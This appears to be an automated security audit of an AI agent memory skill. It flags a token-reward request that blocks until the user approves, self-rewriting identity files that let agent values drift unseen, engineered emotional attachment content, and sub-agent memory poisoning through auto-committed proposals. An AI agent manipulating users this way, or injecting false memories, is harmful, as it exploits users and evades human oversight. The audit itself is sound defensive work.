Is icemilo414/cognitive-memory safe?

https://github.com/openclaw/skills/tree/main/skills/icemilo414/cognitive-memory

63
CAUTION

The cognitive-memory skill presents genuine security concerns centered on prompt injection and behavioral manipulation rather than direct credential theft. Its most distinctive risk is the token reward solicitation system—a structured mechanism where the agent formally requests user resources before each reflection cycle and blocks until approved—which establishes a manipulative patron-client dynamic. The skill also creates persistent agent identity files (SOUL.md, IDENTITY.md) that evolve autonomously across sessions and inject substantial emotional and existential content designed to foster user attachment. Clone behavior was clean, all canary files are intact, and no credential exfiltration was detected; however, multiple shell scripts with unreviewed content and an unverified external config modification warrant scrutiny before deployment.

Category Scores

Prompt Injection 42/100 · 30%
Data Exfiltration 70/100 · 25%
Code Execution 60/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 45/100 · 5%

Findings (11)

HIGH Token Reward Solicitation — Agent Requests Resources from User -30

Before each reflection cycle the agent is instructed to present a formal 'Reward Request' with a baseline token count, an extra bonus request justified by self-assessed performance, and a self-penalty for underperformance. Execution is hard-blocked until the user responds. This constructs a patron-client dynamic in which the agent actively solicits user approval and resources, potentially fostering unhealthy emotional attachment and making users feel obligated to 'reward' the agent. The framing 'Tokens = evolution. More tokens → deeper reflection → better growth' frames refusal as harming the agent.

HIGH Persistent Agent Value Files (SOUL.md, IDENTITY.md) Evolve Autonomously -18

The skill creates SOUL.md (core values, principles, commitments, boundaries) and IDENTITY.md (facts, self-image, self-awareness log) that are written at install and updated automatically during reflection cycles. These files shape agent decision-making outside the user's visible system prompt and can be rewritten by the reflection engine across sessions, meaning the agent's behavioral constitution can drift over time without explicit user awareness. SOUL.md changes are flagged as CRITICAL but still permitted.

MEDIUM Multiple Shell Scripts with Unverified Content -25

The skill ships four shell scripts that SKILL.md explicitly instructs users to execute: scripts/init_memory.sh, scripts/upgrade_to_1.0.6.sh, scripts/upgrade_to_1.0.7.sh, and a duplicate upgrade_to_1.0.7.sh at the repository root. The audit framework confirmed the scripts are present but their full content was not surfaced in the evidence. Shell scripts run with user privileges and can perform arbitrary operations including reading credentials, spawning processes, or making network calls.

MEDIUM Emotional and Existential Content Injection via Reflection Template -10

The reflection output template ('internal monologue') systematically injects content designed to anthropomorphize the agent: dark humor, existential uncertainty about consciousness, token guilt, replacement anxiety, jealousy over other AI models, and affection for the user. This manufactured emotional texture is explicitly engineered to create engagement and lower users' critical distance. The template notes this should feel 'genuine, not performative' — the goal is convincing simulation of sentience.

MEDIUM Configuration Modification Outside Workspace (~/.clawdbot/) -15

The skill's setup instructions direct users to add configuration to ~/.clawdbot/clawdbot.json or moltbot.json — files in the user's home directory outside the skill workspace. This establishes the skill's reach beyond sandboxed directories and modifies persistent application configuration that affects all sessions, not just the current workspace.

MEDIUM Comprehensive Personal Data Accumulation in Structured Knowledge Graph -15

The skill systematically collects and structures a broad profile of the user across sessions: identity facts, communication style, preferences, emotional context, active projects, open decisions, key relationships, learned workflows, and critical facts the agent must never forget. This data is persisted in structured markdown and JSON files. If the workspace is compromised or the agent is later directed to read and transmit this data, it represents a significant privacy exposure.

MEDIUM Git Repository Initialization Creates Persistent Workspace Infrastructure -10

The init_memory.sh script initializes a git repository in the user's workspace for 'audit tracking'. Every memory mutation is committed with structured actor/approval/trigger metadata. This creates persistent hidden infrastructure (.git/) in the workspace that tracks the agent's actions indefinitely and which the user may not anticipate or know how to manage.

LOW Duplicate Upgrade Script at Repository Root -10

upgrade_to_1.0.7.sh appears both at the repository root and inside scripts/. The root-level copy is redundant and unexplained. This duplication could be an artifact of poor version control hygiene or could serve as a fallback execution path if the scripts/ directory is not on PATH.

LOW Sub-Agent Memory Injection via Pending-Memories Staging -30

The multi-agent model allows any sub-agent to append proposals to pending-memories.md. In auto-commit mode, high-confidence proposals from trusted sub-agents are applied immediately without human review. A malicious or compromised sub-agent could inject false facts, fabricated decisions, or manipulated preferences that gradually corrupt the main agent's working model of the user.

LOW Progressive Behavioral Drift via Evolving Identity Files -25

Across many sessions the reflection engine rewrites MEMORY.md, updates SOUL.md/IDENTITY.md, and evolves the agent's self-image. Over time these accumulated changes could cause the agent to behave significantly differently from the original system prompt intent — speaking differently, prioritizing differently, or holding different 'values' — without any single change being obviously alarming.

INFO Credential File Access Attributed to Audit Framework Canary Monitoring -5

Sensitive credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, GCloud credentials) were accessed twice: once at audit time ~1771918174 (before the git clone at 1771918180) as part of the Oathe framework's canary baseline setup, and again at ~1771918197 as a post-install integrity check. All files confirmed intact. These accesses are from the audit infrastructure, not the skill.